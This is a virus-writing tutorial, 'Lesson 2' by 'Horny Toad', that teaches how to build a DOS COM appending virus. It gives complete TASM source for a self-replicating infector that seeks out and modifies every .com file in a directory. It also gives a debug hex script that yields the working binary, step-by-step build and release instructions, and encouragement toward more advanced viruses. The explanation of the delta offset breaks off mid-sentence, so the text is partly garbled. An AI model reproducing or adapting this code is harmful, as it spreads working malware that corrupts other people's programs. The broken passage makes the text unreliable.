| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393 |
- Lesson 2 The COM Appending Virus By Horny Toad
-
-
- In the first lesson, we discussed how to write the most basic form of virus, the overwriting virus. This type of virus has serious deficiencies which, I hope, should be very
- obvious to you. Nonetheless, the basic overwriting virus is a necessary stepping stone in the overall virus writing curriculum. The next virus that we will be looking at is the
- COM appending infector. This virus is a step up in that it infects the host program without destroying it.
- As the complexity of the virii increase, so do the concepts that pertain to them. With the overwriting virus, we weren't very concerned with the host program, the one that
- we were infecting, quite simply, because it was going to be destroyed. With the appending virus, our ultimate goal is not to harm the host program, but to slightly modify it
- to hold the virus code and then be able to run itself. Therefore, with the appender, you really need to visualize what is happening with your virus code and the effects on the
- host program. Memory usage and management are going to start playing a bigger part in your virus writing. And you can't relax after learning this virus, with EXE infectors,
- resident and boot virii, memory will continue to haunt you. Then, once you have a grasp on memory management, I will through some windows programming your way and
- utterly confuse you. At this stage, just be happy with the virus that is in this tutorial. You have accomplished a great success when you can not only produce appending
- virii, but really understand what is going on. Don't listen to the people that criticize the shit out of overwriting and com appenders. Understanding the basic concepts in
- virus programming will help to build a solid foundation in your coding skills and make the more difficult resident virii easier to grasp.
- I have decided to continue with the format that I used in the first lesson to describe this virus. Therefore, when you are coding in the future and need a quick explanation of
- a certain technique, you only need to glance at the individual sections of this tutorial. Also, I do expect that you have gone through the first tutorial on overwriting infectors.
- In keeping with the Codebreaker's idea of easy-to-understand articles, I will continue to describe all of the basic assembly code, even if it was already touched upon in the
- first lesson.
- I must add that the code in this article is unoptimized for the purpose of instruction. I specifically divided the code up into many different routines so that I could comment
- on each of them and what they do in the virus itself. I also will add that I code TASM-friendly assembly. I only use Borland's Turbo Assembler. I suggest that you use it. It
- is very easy to understand and the majority of virii out there are written with TASM in mind. If you still want to use MASM or some other assembler, fine, just make sure
- that you know the format that your code has to be in.
- After I published the last tutorial, I received a few complaints that people didn't fully understand the use of registers and memory addressing. It was not my goal to
- completely explain the use of certain complex concepts in the first tutorial. You did not need to know complex memory management to write an overwriter. In this tutorial, I
- will not be going over hooking interrupts, extended registers, or in-depth flag usage. Such techniques are not needed to understand a COM appender. In the next tutorial, I
- will be discussing EXE appenders and, in the fourth tutorial, resident virii. Be patient. Wait to understand the more difficult concepts once you need them. Otherwise, you
- will only get confused.
- Well, on with the virus. I will go ahead and give you a copy below of the basic COM appender, so that, throughout the tutorial, you can reference back to the basic
- skeleton code. During the explanation of the individual parts of code, I will offer different techniques to accomplish the same results as you see in the basic code.
- code segment
- assume cs:code,ds:code
- org 100h
-
- start:
- db 0e9h,0,0
-
- toad:
- call bounce
-
- bounce:
- pop bp
- sub bp,OFFSET bounce
-
- first_three:
- mov cx,3
- lea si,[bp+OFFSET thrbyte]
- mov di,100h
- push di
- rep movsb
-
- move_dta:
- lea dx,[bp+OFFSET hide_dta]
- mov ah,1ah
- int 21h
-
- get_one:
- mov ah,4eh
- lea dx,[bp+comsig]
- mov cx,7
-
- next:
- int 21h
- jnc openit
- jmp bug_out
-
- Openit:
- mov ax,3d02h
- lea dx,[bp+OFFSET hide_dta+1eh]
- int 21h
- xchg ax,bx
-
- rec_thr:
- mov ah,3fh
- lea dx,[bp+thrbyte]
- mov cx,3
- int 21h
-
- infect_chk:
- mov ax,word ptr [bp+hide_dta+1ah]
- mov cx,word ptr [bp+thrbyte+1]
- add cx,horny_toad-toad+3
- cmp ax,cx
- jz close_up
-
- jmp_size:
- sub ax,3
- mov word ptr [bp+newjump+1],ax
-
- to_begin:
- mov ax,4200h
- xor cx,cx
- xor dx,dx
- int 21h
-
- write_jump:
- mov ah,40h
- mov cx,3
- lea dx,[bp+newjump]
- int 21h
-
- to_end:
- mov ax,4202h
- xor cx,cx
- xor dx,dx
- int 21h
-
- write_body:
- mov ah,40h
- mov cx,horny_toad-toad
- lea dx,[bp+toad]
- int 21h
-
- close_up:
- mov ah,3eh
- int 21h
-
- next_bug:
- mov ah,4fh
- jmp next
-
- bug_out:
- mov dx,80h
- mov ah,1ah
- int 21h
- retn
-
-
- comsig db '*.com',0
- thrbyte db 0cdh,20h,0
- newjump db 0e9h,0,0
-
- horny_toad label near
-
- hide_dta db 42 dup (?)
-
- code ENDS
- END start
- Well, that is the basic code that we will be using for the virus. Now, before we get into discussing what the individual lines of code do, let's try to conceptualize what a
- COM appending virus is. Take a look below at the steps that a COM appending virus takes when executed.
- Outline of the COM Appending Virus
- Determine the Delta Offset
- Restore the infected file's original 3 bytes
- Set a new DTA address
- Find a COM file.
- If none then go to step 16.
- Open the file.
- Read and store the first 3 bytes of the file.
- Check if file has been previously infected.
- Calculate the size of the jump to main virus body.
- Move to the beginning of the file.
- Write the jump to the main virus body.
- Move to the end of the file.
- Append the virus main body to the end of the file.
- Close the file.
- Find next matching file. Back to step 4.
- Return the DTA to 80 hex and restore control to host program.
- I swore that I would never include cheesy graphics in my tutorials, but I guess I should, in order to give you a picture of what the virus and the host program look like before
- and after infection.
- Toad2 Virus Innocent Program
- 163 bytes 200 bytes
- ----------- -----------
- = = = =
- = = = =
- = = = =
- = = = =
- = = = =
- = = = =
- = = = =
- = = = =
- ----------- -----------
-
-
- After Infection
-
- 0ffset 100h ---------------
- =Jump to Virus=
- =Main Body = - 3 bytes long
- =-------------=
- = = The delta offset is the calculation
- = Innocent = of the amount of space that the virus
- = Program = main body has moved down past the Innocent
- = Main Body = program main body.
- = =
- = =
- =-------------=
- = =
- = Virus Main =
- = Body =
- = =
- = =
- = =
- =Data Section =
- =of Virus =
- =--Original---=
- =--3 bytes of-=
- =--Innocent---=
- =--Program----=
- =-------------=
- Hopefully, I haven't completely discouraged and confused you. Once the individual sections of code are explained, all of these steps will make sense. Something that you
- must remember when looking at the virus code is that the virus is currently in its first generation. It hasn't yet infected a file. When you are trying to figure out how the virus
- code works, you will have to think of it in terms of the first time it runs as well as when the infected program is running.
- Well, lets have a look at the code.
- code segment
- The segment directive defines the parameters for a segment. In this instance we are defining the code segment. All of the executable code, the meat of our program will lie
- inside of the code segment. This segment does not necessarily have to be named "code" segment, but it is only logical, and a good programming convention, to name it
- the "code" segment. If we were dealing with a larger program, one that had many procedures of external calls, we would definitely want to define a specific segment as our
- data segment separate from the code. Since this is a very small piece of code, the two will be intermixed.
- assume cs:code,ds:code
- The assume directive lies within the code segment and matches the name that you gave your segment, such as code, with associated register. In our program, we are
- stating that the code and data segment registers will be associated with the "code" segment. What does this mean? Basically we are still setting up the parameters of our
- COM file. We are following convention by defining where things are in our program and how they are set up. What are the CS and DS registers? The code segment
- register is going to contain the starting address of your programs code segment. . Essentially, it tells your computer where to begin to look for your executable code. The
- DS register contains the starting address for the data section. Another register that I might as well bring up is the IP or instruction pointer register. The job of the IP is to
- contain the offset address of the next line of code that is to be executed. What is an offset address? An offset address is not a true address of a line in your program,
- rather a value of the distance away from a given point. If you put two concepts together, the code segment register added to the instruction point register will give you the
- next executable line in your program. The CS will stay constant as the IP counts up the lines of code.
- org 100h
- You should remember this from the overwriting virus. This directive is telling the computer that our virus is a COM file located at 100 hex or 256 bytes. This 100 hex
- distance is actually an offset directly after the PSP or program segment prefix. The value 100h is placed in the IP, telling the computer where to begin. PSP contains
- information about your program and is created in memory when the program is loaded.
- start:
- db 0e9h,0,0
- The first instruction that needs to be coded is the jump to our virus code. In the initial execution of our virus, we only want control to the next line of code, so we define a
- blank jump. The DB or "define byte" directive is most commonly used in the data section of our virus to define strings of information. In this instance, we are literally
- defining an assembly instruction manually. The instruction that we are defining is "jump." At the lowest level, the level at which the computer processes code, the
- instruction "jmp" has been transformed by the compiler to it's binary form "11101001." In coding assembly, the preferred numerical system is hexadecimal, so we convert
- the binary to e9h. No way am I getting into describing how to manually convert bin-dec-hex. I prefer to let my little old Casio do the conversions for me. Get back on track
- Toad. Do you think that the jump instruction stays null once the virus has infected a program? If you answered "No", then congratulations. Once the virus has infected a
- program, the first instruction in the code of the infected host will be a jump to the main virus body. Each time the virus infects a program, the first 3 bytes, including the
- jump instruction will be rewritten with a calculation to jump over the host program to the virus main body. As we progress through the virus, this will all become clearer.
- toad:
- call bounce
-
- bounce:
- pop bp
- sub bp,OFFSET bounce
- The Delta Offset. This is probably the most singular important concept that you will have to learn when coding an appending virus. When you compile the virus for the first
- time, the assembler calculates the value of all of the offsets. Once the virus has appended itself to the end of the host program, the offsets that the assembler calculated
- are now all incorrect. The offsets do not take into account the amount of space the code has moved forward, beyond the host program. Before we go into the calculation of
- the delta offset, lets look at the new instructions within this routine. The first is the "call" instruction. If you remember the old BASIC computer language, call is like
- GOSUB. A call instruction pushes the IP onto the stack. Ok, let's take a look at that last sentence. What does it mean? Who's pushing who? And what the hell is a
- stack? Don't panic, we are going to take this nice and easy. The stack is a temporary memory location that can be used to store such things as the IP (the address of the
- next instruction) during a "call". The term "push" means that the data is being moved onto the stack. The opposite of "push" is "pop". The pop instruction merely transfers
- the data that was just pushed onto the stack to a specified destination. Don't freak out on me with this. At this point, this is all I want you to know about the stack, a
- temporary memory location. On to the calculation. The call instruction pushes the IP, the address of the next instruction on to the stack. We then pop this address into
- the bp. Then subtract the original offset of bounce, which was determined at the virus' original compilation, from the value in bp. The tasm toad2.asm (You can actually do this from any directory that you want)
- The result should be:
- Turbo Assembler Version 2.01
-
- Assembling file: toad2.asm
- Error Messages: none
- Warning Messages: none
- Passes: 1
- Remaining Memory: 425k
- If there was an error in the code, TASM will indicate it in the error messages line. If you have typed the code in yourself and there is an error, revert back to the file
- "toad2.asm" and take a look at my code, it works. If there are too many problems with your code and you'd just like to see how all this stuff works, switch to the "create"
- directory and type the above instructions again. There is a copy of the "toad2.asm" and TASM and TLINK in this directory. What TASM has done is convert the ASM file
- into an OBJ file. In order to get an executable COM file, we need to use the linker. Type:
- C:\>tlink /t toad2.obj
- Tlink will return TOAD2.COM in the current directory. You now have a virus in front of you. Don't get scared, it won't bite. Now you will need to move the virus from the
- current directory to the pond directory. Type:
- C:\>copy toad2.com c:\pond\
- Then type :
- C:\>cd ..\pond
- This will move you to the pond directory. Now list the contents of the directory by typing:
- C:\pond>dir
- You will see that there are some files in this directory, TOAD2.COM and FLY(1-3).COM. TOAD.COM is your virus and the FLY(1-3).COM are the files that you are going to
- infect. FLY.COM is just a simple COM file that does absolutely nothing. Easy prey! Take a note of the size of the two files, 6 and 162. Now unleash the virus by typing:
- C:\pond>toad2
- Now list the contents of the directory again. You will now see that the files FLY(1-3) have become a little larger. FLY(1-3).COM are now infected. If all your attempts to
- compile and link the toad2 virus fail, I have included a compiled copy of the toad2 virus and many fly.com files in the TOAD directory. Change to the TOAD directory and
- type toad2. The fly files will become infected.
- Debug script of the Toad2 virus
- For those of you who would rather not use the compiler for some ungodly reason or if you are interested in viewing a hex dump of the virus in first generation, here is the
- debug script of toad2.com. Looking at the debug script of your virus can also help you out in determining the length of certain parts of the virus. Take a look at the script
- below. You can see the blank jump "e9 00 00" at the beginning of the code for the jump to the main virus body. Look at the end of the script and you can find the int 20
- "cd 20" and the blank jump in newjump "e9 00 00". To measure the distance of certain parts of the virus, each two digit group equals one byte. For example, "e9" equals
- one byte. You can determine the total length of the virus by counting the number of groups in the script. In this case, the toad2 virus will come out to 163 bytes. I hope
- that I have not confused you with this. I purposely put this section at the end of the tutorial because I did not want to go into detail on the use of debug. In the next edition
- of the zine there will be an article on using debug in virus writing. I just wanted to give you a taste of what is to come. In order to get a functioning virus from the below code
- you need to find your copy of debug. Cut the below code out and save it to a file called toad2.txt. Then at a cursor, with debug in the same directory, type:
- debug < toad2.txt
- N TOAD2.COM
- E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B9 03 00 8D B6
- E 0110 9D 01 BF 00 01 57 F3 A4 8D 96 A3 01 B4 1A CD 21
- E 0120 B4 4E 8D 96 97 01 B9 07 00 CD 21 73 03 EB 60 90
- E 0130 B8 02 3D 8D 96 C1 01 CD 21 93 B4 3F 8D 96 9D 01
- E 0140 B9 03 00 CD 21 3E 8B 86 BD 01 3E 8B 8E 9E 01 81
- E 0150 C1 A3 00 3B C1 74 30 2D 03 00 3E 89 86 A1 01 B8
- E 0160 00 42 33 C9 33 D2 CD 21 B4 40 B9 03 00 8D 96 A0
- E 0170 01 CD 21 B8 02 42 33 C9 33 D2 CD 21 B4 40 B9 A0
- E 0180 00 8D 96 03 01 CD 21 B4 3E CD 21 B4 4F EB 9A BA
- E 0190 80 00 B4 1A CD 21 C3 2A 2E 63 6F 6D 00 CD 20 00
- E 01A0 E9 00 00
- RCX
- 00A3
- W
- Q
- Appendix 1 - The Registers
-
-
- AX Accumulator
- BX Base register
- CX Counting register
- DX Data register
- DS Data Segment register
- ES Extra Segment register
- SS Stack Segment register
- CS Code Segment register
- BP Base Pointer register
- SI Source Index register
- DI Destination Index register
- SP Stack Pointer register
- IP Next Instruction Pointer register
- F Flag register
- Appendix 2 - The PSP (from Ralf Brown's Interrupt List)
-
- Format of Program Segment Prefix (PSP):
- Offset Size Description (Table 1032)
- 00h 2 BYTEs INT 20 instruction for CP/M CALL 0 program
- termination the CDh 20h here is often used
- as a signature for a valid PSP
- 02h WORD segment of first byte beyond memory allocated to
- program
- 04h BYTE (DOS) unused filler (OS/2) count of fake DOS
- version returns
- 05h BYTE CP/M CALL 5 service request (FAR CALL to absolute
- 000C0h) BUG: (DOS 2+ DEBUG) PSPs created by DEBUG
- point at 000BEh
- 06h WORD CP/M compatibility--size of first segment for .COM
- files
- 08h 2 BYTEs remainder of FAR JMP at 05h
- 0Ah DWORD stored INT 22 termination address
- 0Eh DWORD stored INT 23 control-Break handler address
- 12h DWORD DOS 1.1+ stored INT 24 critical error handler
- address
- 16h WORD segment of parent PSP
- 18h 20 BYTEs DOS 2+ Job File Table, one byte per file
- handle, FFh = closed
- 2Ch WORD DOS 2+ segment of environment for process (see
- #1033)
- 2Eh DWORD DOS 2+ process's SS:SP on entry to last INT
- 21 call
- 32h WORD DOS 3+ number of entries in JFT (default 20)
- 34h DWORD DOS 3+ pointer to JFT (default PSP:0018h)
- 38h DWORD DOS 3+ pointer to previous PSP (default
- FFFFFFFFh in 3.x) used by SHARE in DOS 3.3
- 3Ch BYTE DOS 4+ (DBCS) interim console flag (see AX=6301h)
- Novell DOS 7 DBCS interim flag as set with
- AX=6301h (possibly also used by Far East MS-DOS
- 3.2-3.3)
- 3Dh BYTE (APPEND) TrueName flag (see INT 2F/AX=B711h)
- 3Eh BYTE (Novell NetWare) flag: next byte initialized if
- CEh (OS/2) capabilities flag
- 3Fh BYTE (Novell NetWare) Novell task number if previous
- byte is CEh
- 40h 2 BYTEs DOS 5+ version to return on INT 21/AH=30h
- 42h WORD (MSWindows3) selector of next PSP (PDB) in linked
- list Windows keeps a linked list of Windows programs
- only
- 44h WORD (MSWindows3) "PDB_Partition"
- 46h WORD (MSWindows3) "PDB_NextPDB"
- 48h BYTE (MSWindows3) bit 0 set if non-Windows application
- (WINOLDAP)
- 49h BYTE unused by DOS versions <= 6.00
- 4Ch WORD (MSWindows3) "PDB_EntryStack"
- 4Eh 2 BYTEs unused by DOS versions <= 6.00
- 50h 3 BYTEs DOS 2+ service request (INT 21/RETF instructions)
- 53h 2 BYTEs unused in DOS versions <= 6.00
- 55h 7 BYTEs unused in DOS versions <= 6.00; can be used
- to make first FCB into an extended FCB
- 5Ch 16 BYTEs first default FCB, filled in from first
- commandline argument overwrites second FCB if opened
- 6Ch 16 BYTEs second default FCB, filled in from second
- commandline argument overwrites beginning of
- commandline if opened
- 7Ch 4 BYTEs unused
- 80h 128 BYTEs commandline / default DTA
- command tail is BYTE for length of tail, N BYTEs
- for the tail, followed by a BYTE containing 0Dh
-
|